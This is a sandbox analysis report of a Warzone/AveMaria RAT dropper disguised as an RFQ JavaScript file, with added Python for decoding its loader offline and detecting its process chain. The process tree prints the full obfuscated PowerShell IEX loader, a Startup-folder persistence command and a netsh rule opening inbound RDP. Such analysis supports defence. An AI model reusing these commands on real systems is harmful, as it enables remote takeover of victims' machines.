Analysis

  • max time kernel
    150s
  • max time network
    183s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    29-11-2022 10:30

General

  • Target

    RFQ scope of requirements.js

  • Size

    2KB

  • MD5

    84ae648af28a2f5acd3c67fabde24615

  • SHA1

    45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b

  • SHA256

    c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d

  • SHA512

    7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat (also tracked as AveMaria) is a native RAT written in C++ with multiple plugins, sold as malware-as-a-service (MaaS).

  • Warzone RAT payload 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic description labels this likely ransomware behaviour; for a RAT such as Warzone it is equally consistent with plain drive enumeration, and nothing else in this report indicates encryption activity.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Can’t reach this page Can’t reach this page Make sure the web address http://104.223.67.151 is correct Search for this site on Bing Refresh the page Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. More information <id id="moreInformation">More information</id> This website could not be found. Error Code: INET_E_RESOURCE_NOT_FOUND Fix connection problems
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,511
55551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151
115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
        • Sets DLL path for service in the registry
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Users\Admin\AppData\Local\Temp\110.exe
          "C:\Users\Admin\AppData\Local\Temp\110.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3688
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389
            5⤵
            • Modifies Windows Firewall
            PID:4232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1380
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
      PID:2040
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1512 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1976
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1512 CREDAT:82952 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2504
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
      1⤵
        PID:3288
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k NetworkService -s TermService
        1⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3860
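
The command line of PID 2844 above is the first stage of the loader: `$o00=[char]105 + 'EX'` builds the string `iEX`, `sal P $o00` aliases it to `P`, and the long digit string is decoded with `.replace('5','0')`, so every comma-separated token becomes eight binary digits, one byte of the next-stage script, which is then joined and passed to `Invoke-Expression`. The Python below is an added example and not part of the sandbox report or the malware: it reverses that transform offline, without ever executing the decoded text. The digit prefix is copied verbatim from the page (first 111 tokens); the regex, the function names and the sample command line wrapper are this example's own assumptions. The prefix decodes to `$ErrorActionPreference = 'SilentlyContinue';` followed by a statement that selects `SecurityProtocolType` 3072, the value for TLS 1.2, which is what a download stage needs before fetching its payload.

```python
import re

# Constructed sample: the first 111 comma-separated tokens of the obfuscated string
# passed to powershell.exe (PID 2844) in the process tree above, copied from the page.
OBFUSCATED_PREFIX = (
    "55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,"
    "51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,"
    "51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,"
    "55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,"
    "51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,"
    "51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,"
    "51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,"
    "51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,"
    "51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,"
    "51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,"
    "51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,"
    "51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,"
    "51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,"
    "55155555,55115511,55115555,55115111,55115515,55151551,55111511"
)

# Pulls the digit blob out of a captured command line. The loader assigns it as
#   $gf=('<digits>'.replace('5','0')|IEX)
# Whitespace is allowed inside the capture because report exports wrap long lines.
# (This regex is the example's own, not something from the page.)
BLOB_RE = re.compile(r"\$gf=\('([15,\s]+)'\.replace\('5','0'\)")


def extract_blob(cmdline: str) -> str:
    """Return the obfuscated digit blob from a command line, or raise if absent."""
    m = BLOB_RE.search(cmdline)
    if not m:
        raise ValueError("no $gf=('...'.replace('5','0') blob in command line")
    return m.group(1)


def decode_blob(blob: str) -> str:
    """Reproduce the loader's transform offline: '5' -> '0' turns each token into
    8 binary digits, int(token, 2) is one byte, and the bytes are UTF-8 text.
    Nothing here is evaluated; the result is returned as a plain string."""
    compact = re.sub(r"\s+", "", blob)          # undo line wrapping from exports
    tokens = [t for t in compact.replace("5", "0").split(",") if t]
    bad = [t for t in tokens if not re.fullmatch(r"[01]{8}", t)]
    if bad:
        raise ValueError(f"unexpected token(s), not 8 binary digits: {bad[:3]}")
    return bytes(int(t, 2) for t in tokens).decode("utf-8")


def statements(script: str) -> list:
    """Split decoded PowerShell on ';' for reading. Naive on purpose: a string
    literal containing ';' would be split too, which is acceptable for triage."""
    return [s.strip() for s in script.split(";") if s.strip()]


if __name__ == "__main__":
    # Wrap the prefix the way the captured command line wraps it, then decode it.
    sample_cmdline = f"powershell.exe function f {{ $gf=('{OBFUSCATED_PREFIX}'.replace('5','0')|IEX) }}"
    for stmt in statements(decode_blob(extract_blob(sample_cmdline))):
        print(stmt)
```

Run it against the full command line (PID 2844) to recover the complete second stage; because the page wraps that line, `decode_blob` strips whitespace before parsing. Decoding this way, rather than letting PowerShell evaluate the string, is the safe default for any `IEX`-terminated loader.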

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence
    Modify Existing Service (T1031): 1
    Registry Run Keys / Startup Folder (T1060): 1
  • Defense Evasion
    Modify Registry (T1112): 2
  • Discovery
    Query Registry (T1012): 1
    System Information Discovery (T1082): 2
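
The chain wscript.exe → powershell.exe → InstallUtil.exe → 110.exe → netsh.exe in the process tree above, the Move-Item that copies the .js into the Startup folder (T1060), and the netsh rule that opens inbound TCP/3389 are the points a detection engineer would key on; the firewall rule, together with rdpwrap.ini and the DLL dropped under C:\Program Files\Microsoft DN1 and the TermService svchost that loads a dropped DLL, is consistent with an RDP Wrapper style hidden-RDP component. The Python below is an added example, not part of the sandbox report: it encodes four of those behaviours as rules over process-creation events. The event list is constructed from the process tree on this page (PIDs and command lines as shown, the obfuscated PowerShell body abbreviated) and is not an export from a real EDR or Sysmon feed; rule names, the `ProcEvent` type and the regexes are this example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the process tree in this report; not a real telemetry export.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(5088, 1, r"C:\Windows\system32\wscript.exe",
              r'wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"'),
    ProcEvent(3016, 5088, PS,
              f'"{PS}" Move-Item ' + r"'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' "
              r"'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'"),
    ProcEvent(2844, 5088, PS,
              f'"{PS}" function ermkflll ' + "{ $o00=[char]105 + 'EX';sal P $o00 (body abbreviated) } ermkflll"),
    ProcEvent(4068, 2844, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'),
    ProcEvent(3688, 4068, r"C:\Users\Admin\AppData\Local\Temp\110.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\110.exe"'),
    ProcEvent(4232, 3688, r"C:\Windows\SysWOW64\netsh.exe",
              r'netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
RDP_RULE_RE = re.compile(r"advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=3389\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Local|Roaming)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def trailing_args(cmdline: str) -> str:
    """Everything after the (possibly quoted) image token; '' when there are none."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def ancestry(e: ProcEvent, by_pid: dict):
    """Yield the parent chain of e, nearest first; guards against pid reuse loops."""
    seen = set()
    cur = by_pid.get(e.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def detect(events) -> list:
    """Return (rule, pid) pairs for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Script host launching PowerShell: the .js dropper's hand-off to the loader.
        if name == "powershell.exe" and pname in SCRIPT_HOSTS:
            findings.append(("script_host_spawns_powershell", e.pid))
        # PowerShell moving/copying something into the per-user Startup folder.
        if name == "powershell.exe" and "move-item" in e.cmdline.lower() and STARTUP_RE.search(e.cmdline):
            findings.append(("startup_folder_persistence", e.pid))
        # A signed .NET utility started by PowerShell with no arguments at all:
        # the classic target of the hollowing seen via SetThreadContext above.
        if name == "installutil.exe" and pname == "powershell.exe" and not trailing_args(e.cmdline):
            findings.append(("installutil_no_args_hollowing_target", e.pid))
        # Inbound 3389 opened by a chain that includes a binary in a user-writable path.
        if name == "netsh.exe" and RDP_RULE_RE.search(e.cmdline) and any(
                USER_WRITABLE_RE.search(a.image) for a in ancestry(e, by_pid)):
            findings.append(("rdp_firewall_rule_from_user_writable_ancestor", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The ancestry walk matters for the netsh rule: netsh itself is a legitimate Microsoft binary, and the signal is that its parent chain runs back through `C:\Users\Admin\AppData\Local\Temp\110.exe`. The same walk is what you would extend to catch the TermService svchost loading a DLL from outside System32, once image-load events are in the feed.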

Downloads

      • C:\Program Files\Microsoft DN1\sqlmap.dll
        Filesize

        114KB

        MD5

        461ade40b800ae80a40985594e1ac236

        SHA1

        b3892eef846c044a2b0785d54a432b3e93a968c8

        SHA256

        798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

        SHA512

        421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        471B

        MD5

        bd4f3cb3175ff83bbc2c827705950a60

        SHA1

        9d940539de8317a8a6444559d9fc9f190dd9f80b

        SHA256

        ff821119d7d2bf9d795503ed63996c81611b84cdcdacac943da9a9ae2d0d2384

        SHA512

        02b99cb5a7e2cf6004fd010c5718f85830aca7b6f43b5ed929d2df8ca4209a29cfd9e54280a35392b2617ab58e578c097834ce24e9baa8b226c6181c64c0d377

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        434B

        MD5

        e6347740be8708efab6ea77b64a21632

        SHA1

        65b98ec9b7ab6da1605eef98f47f744803232fed

        SHA256

        0a8ed9b470861dd88692832e0056a983eeec198b8ad88a23367c6f6c6d4d3f78

        SHA512

        224dd590b293eb763dc61b361d929a162938f8dd90f1fedfd5619b5813f32b8cc0510129419019c3301c4bcc3193e639e3f8abf7af19a907e5a47cc47dd68e26

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d48c6ff9af25e5ab8db50534e5033a2d

        SHA1

        92d88a90bd0ab6ed73c60d0fff92cd514a9de623

        SHA256

        8a353cbc1d2fe9b22bb851610aa8f2fdff9f5e337845df182e6a89cf997631a4

        SHA512

        c82209e589e9761e2abddb619d5a1b2a94b2d2c8ef77a76812b3a44f3ab18257b31cd9f2dae117c3d69552ee0de8cd73a19cda94a960065e04c039b4dd54725c

      • C:\Users\Admin\AppData\Local\Temp\110.exe
        Filesize

        70KB

        MD5

        ca96229390a0e6a53e8f2125f2c01114

        SHA1

        a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

        SHA256

        0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

        SHA512

        e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

      • C:\Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      • C:\Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      • \??\c:\program files\microsoft dn1\rdpwrap.ini
        Filesize

        291KB

        MD5

        914d30cdc026d77366e6ac105cd5eefc

        SHA1

        95e0c8463f4995bf126fa0cffab4a8a947963a1a

        SHA256

        f00109618610375ea494b1406fa7e5548d75a52669b1bf1761a80394301b42f8

        SHA512

        184c1c12c18b02e27a8674476c768b0dcaef7dff722dfd27e4f342ba7ce65653c399eed0bedc3d9cbca0fec0fa5a17077e8e71f4d7807e2119eec1687ccc7635

      • \??\c:\program files\microsoft dn1\sqlmap.dll
        Filesize

        114KB

        MD5

        461ade40b800ae80a40985594e1ac236

        SHA1

        b3892eef846c044a2b0785d54a432b3e93a968c8

        SHA256

        798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

        SHA512

        421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

      • memory/1380-145-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

      • memory/1380-146-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

      • memory/1380-142-0x0000000000000000-mapping.dmp
      • memory/2844-148-0x00007FF80F0A0000-0x00007FF80F1EE000-memory.dmp
        Filesize

        1.3MB

      • memory/2844-141-0x0000000000000000-mapping.dmp
      • memory/2844-144-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

      • memory/2844-156-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

      • memory/3016-135-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

      • memory/3016-133-0x0000000000000000-mapping.dmp
      • memory/3016-134-0x0000012B56310000-0x0000012B56332000-memory.dmp
        Filesize

        136KB

      • memory/3016-137-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

      • memory/3544-140-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

      • memory/3544-136-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

      • memory/3544-132-0x0000000000000000-mapping.dmp
      • memory/3688-169-0x0000000000330000-0x000000000035D000-memory.dmp
        Filesize

        180KB

      • memory/3688-165-0x0000000000330000-0x000000000035D000-memory.dmp
        Filesize

        180KB

      • memory/3688-161-0x0000000000000000-mapping.dmp
      • memory/4068-150-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

      • memory/4068-160-0x000000000B0A0000-0x000000000B240000-memory.dmp
        Filesize

        1.6MB

      • memory/4068-157-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

      • memory/4068-155-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

      • memory/4068-154-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

      • memory/4068-151-0x000000000040B556-mapping.dmp
      • memory/4232-164-0x0000000000000000-mapping.dmp